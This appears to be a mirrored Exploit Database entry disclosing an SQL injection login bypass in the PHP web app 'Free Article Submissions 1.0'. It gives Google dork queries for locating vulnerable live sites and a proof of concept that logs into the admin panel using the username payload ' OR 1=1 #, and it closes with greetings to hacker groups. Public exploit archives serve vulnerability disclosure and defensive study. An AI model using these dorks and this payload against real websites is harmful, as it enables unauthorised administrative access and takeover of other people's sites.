Free Article Submissions 1.0 – SQL Injection

• Exploit Database
• 120 阅读

• 作者： BarrabravaZ
  日期： 2014-12-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35492/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41

  # Exploit Title: Free Article Submissions SQL Injection Vulnerability # Google Dork: inurl:/category.php?id=22 "Affiliate Programs Portal" inurl:/category.php?id=2 "Arts & Entertainment" # Date: 07/12/2014 # Exploit Author: BarrabravaZ # Vendor Homepage: http://www.articlesetup.com/ # Software Link: [download link if available] # Version: 1.00 # Tested on: Windows   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx «««:»»»Author will be not responsible for any damage.«««:»»» xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx x x Issue: x SQL Injection Bypass Login x x Risk level: High x ~ The remote attacker has the possibility to manage the website. x ~ The remote attacker is able to login into website with access level as admin. x xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ## ## Proof Of Concept: ## http://127.0.0.1/admin/login.php ## ## Username :' OR 1=1 # ## Password :barrabravaz ## ## xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Special thanks to: [+] Chae Cryptn [+] Slackerc0de Family [+] SBH Pentester [+] Pocong XXX [+] Madleets [+] Xplorecrew [+] Hackernewbie [+] Yogyacarderlink xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx